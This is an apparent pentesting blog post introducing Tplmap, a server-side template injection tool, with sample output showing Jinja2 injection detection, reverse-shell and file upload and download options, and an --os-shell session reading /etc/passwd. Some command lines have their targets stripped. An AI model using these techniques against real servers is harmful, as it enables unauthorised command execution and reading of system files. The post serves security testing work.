Tplmap – identify and use the template engine


When you run a penetration test of a web page that generates dynamic content using templates with user-provided values, you may encounter server-side template injection vulnerability. Manual identification of the template engine you are dealing with and subsequent exploitation can be easily automated using the Tplmap tool.

Tplmap is able to detect and use SSTI in several types of template engines. It has such functionalities as browsing the file system and remotely executing commands on the attacked server.

$ ./ -u ''
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '{*}'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:

GET parameter: name
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: linux
  Technique: render

Shell command execution: approx.
   Bind and reverse shell: approx.
   File write: ok
   File read: ok
   Code evaluation: ok, python code

[+] Rerun tplmap providing one of the following options:

--os-shell Run shell on the target
    --os-cmd Execute shell commands
    --bind-shell PORT Connect to a shell bind to a target port
    --reverse-shell HOST PORT Send a shell back to the attacker's port
    --upload LOCAL REMOTE Upload files to the server
    --download REMOTE LOCAL Download remote files

Use the --os-shell option to run the pseudoterminal on the target.

$ ./ --os-shell -u ''
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Run commands on the operating system.

linux $ whoami
linux $ cat /etc/passwd

Tplmap supports more than 15 template engines:

EngineRemote command executionBlindCode evaluationRead fileWrite to file
Python (code eval)Python
Nunjucks, KentuckyJavascript
JavaScript (code eval)Javascript
Dust (<= [email protected])Javascript
Ruby (code eval)Ruby
Smarty (unsecured)PHP
PHP (code eval)PHP
Twig (<=1.19)PHP
Velocity, New×
Twig (>1.19)×××××
Smarty (secured)×××××
Dust (> [email protected])×××××

Tplmap can be found on the creator github – tplmap.

Chcesz wiedzieć więcej?

Zapisz się i bądź informowany o nowych postach (zero spamu!). Dodatkowo otrzymasz, moją prywatną listę 15 najbardziej przydatnych narzędzi (wraz z krótkim opisem), których używam przy testach penetracyjnych.

Nigdy nie podam, nie wymienię ani nie sprzedam Twojego adresu e-mail. W każdej chwili możesz zrezygnować z subskrypcji.

Bookmark the permalink.

Share your opinion about the article.